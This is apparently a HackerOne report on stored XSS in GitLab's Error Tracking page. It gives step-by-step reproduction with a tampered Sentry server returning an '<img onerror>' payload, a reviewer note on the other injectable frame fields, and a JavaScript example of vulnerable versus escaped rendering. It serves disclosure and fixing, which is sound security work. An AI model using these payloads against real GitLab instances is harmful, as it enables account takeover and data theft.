Stored XSS on the Error Tracking page
HackerOne report #859888 by mike12
on 2020-04-26, assigned to @jeremymatos:
Hello Gitlab!
Steps to reproduce
- Set up a Sentry server or just use this server: http://REDACTED .
- Install Sentry Server, use this doc
- Connect to the Sentry container:
  docker exec -it sentry_onpremise_web_1 /bin/bash
- Install Vim:
  apt update && apt install vim -y
- Open the stacktrace.py file:
  vim /usr/local/lib/python2.7/site-packages/sentry/interfaces/stacktrace.py
- Replace "colNo": self.colno, with "colNo": "<img src=x onerror=alert(1)>",
on line 210def get_api_context(self, is_public=False, pad_addr=None, platform=None): from sentry.stacktraces.functions import get_function_name_for_frame function = get_function_name_for_frame(self, platform) data = { "filename": self.filename, "absPath": self.abs_path, "module": self.module, "package": self.package, "platform": self.platform, "instructionAddr": pad_hex_addr(self.instruction_addr, pad_addr), "symbolAddr": pad_hex_addr(self.symbol_addr, pad_addr), "function": function, "rawFunction": self.raw_function, "symbol": self.symbol, "context": get_context( lineno=self.lineno, context_line=self.context_line, pre_context=self.pre_context, post_context=self.post_context, ), "lineNo": self.lineno, - "colNo": self.colno, + "colNo": "<img src=x onerror=alert(1)>", "inApp": self.in_app, "trust": self.trust, "errors": self.errors, } if not is_public: data["vars"] = self.vars
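Review bot: the patch changes only the "colNo" entry, but get_api_context() fills "filename", "absPath", "module", "package", "function", "rawFunction", "symbol", "context" and "lineNo" from the same event data, so a GitLab-side fix that escapes colNo alone would leave the same sink reachable through those fields; the renderer should escape every frame field it outputs, and the steps should say so. It is also worth stating that patching Sentry is only a convenience here: the tampered value reaches GitLab because GitLab renders whatever the server at the configured Sentry API URL returns, so any server the attacker controls at that URL produces the same result without a shell on a real Sentry host.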
- Exit from the container
- Restart the container:
  docker restart sentry_onpremise_web_1
- Create a new Sentry project, use this doc
- Capture an error using Sentry SDK. Use docs: Initialize Sentry SDK and Capture your First Error
- Generate a Sentry auth token, use this doc
- Run Gitlab:
  docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest
- Create a new Gitlab project
- Go to Settings->Operations->Error Tracking and connect Sentry to the Gitlab project:
  - Check the "Active" checkbox
  - Sentry API URL: http://REDACTED:9000 (or your Sentry server URL)
  - Auth Token: REDACTED2 (or your Sentry auth token)
  - Project: Sentry | javascript (or your Sentry project)
- Go to Operations->Error Tracking and open details for an error.
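The last step works because the Error Tracking page puts the frame's colNo into the page as markup rather than as text. The following JavaScript is an added example, not GitLab's or Sentry's code, that shows the vulnerable render pattern next to an escape-on-output version. The frame object is constructed here with the field names from the get_api_context() dict in the patch above and the report's payload; the function names (renderFrameVulnerable, renderFrameSafe, escapeHtml, leaksMarkup) are assumptions for the example.

```javascript
// Added example, not GitLab's or Sentry's code: how an attacker-controlled
// Sentry frame field becomes stored XSS when it is rendered as HTML, and the
// escape-on-output fix. Field names mirror the get_api_context() dict shown in
// the report's patch; nothing else is assumed about Sentry's real API.

// Constructed sample: one stack frame as a tampered Sentry server could return
// it (the colNo value is the payload from the report).
const maliciousFrame = {
  filename: "app.js",
  function: "handleClick",
  lineNo: 42,
  colNo: "<img src=x onerror=alert(1)>", // attacker-controlled
};

// Vulnerable pattern: untrusted API data interpolated straight into markup that
// is later assigned to innerHTML / v-html. The payload survives intact and the
// browser executes the onerror handler when the <img> fails to load.
function renderFrameVulnerable(frame) {
  return `<li>${frame.filename} in ${frame.function} at line ${frame.lineNo}:${frame.colNo}</li>`;
}

// Minimal HTML escaper for text placed in element content or a double-quoted
// attribute. Covers the five characters that can start or end markup.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened pattern: every Sentry-supplied field is escaped where it enters the
// markup. colNo is deliberately not special-cased: filename, function and the
// rest come from the same untrusted source and can carry the same payload.
function renderFrameSafe(frame) {
  const filename = escapeHtml(frame.filename);
  const fn = escapeHtml(frame.function);
  const lineNo = escapeHtml(frame.lineNo);
  const colNo = escapeHtml(frame.colNo);
  return `<li>${filename} in ${fn} at line ${lineNo}:${colNo}</li>`;
}

// Check used to compare the two renderers: strip the renderer's own <li>
// wrapper; any '<' left over means data reached the page as a tag.
function leaksMarkup(html) {
  return html.replace(/^<li>|<\/li>$/g, "").includes("<");
}

console.log("vulnerable:", renderFrameVulnerable(maliciousFrame));
console.log("safe:      ", renderFrameSafe(maliciousFrame));
console.log("vulnerable leaks markup:", leaksMarkup(renderFrameVulnerable(maliciousFrame)));
console.log("safe leaks markup:      ", leaksMarkup(renderFrameSafe(maliciousFrame)));
```

Run it with node: the vulnerable renderer emits the <img> tag unchanged, the safe one emits &lt;img src=x onerror=alert(1)&gt;, which a browser displays as literal text. The same escape is applied to every field because a tampered or attacker-run Sentry server controls all of them equally, not just the column number used in the report.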
My GitLab version
root@gitlab:/# gitlab-rake gitlab:env:info
System information
System:
Current User: git
Using RVM: no
Ruby Version: 2.6.5p114
Gem Version: 2.7.10
Bundler Version:1.17.3
Rake Version: 12.3.3
Redis Version: 5.0.7
Git Version: 2.26.2
Sidekiq Version:5.2.7
Go Version: unknown
GitLab information
Version: 12.10.1
Revision: e658772bd63
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 11.7
URL: http://gitlab.example.com
HTTP Clone URL: http://gitlab.example.com/some-group/some-project.git
SSH Clone URL: git@gitlab.example.com:some-group/some-project.git
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 12.2.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Git: /opt/gitlab/embedded/bin/git
Impact
An attacker can:
- Perform any action within the application that a user can perform
- Steal sensitive user data
- Steal user's credentials
Attachments
Warning: Attachments received through HackerOne, please exercise caution!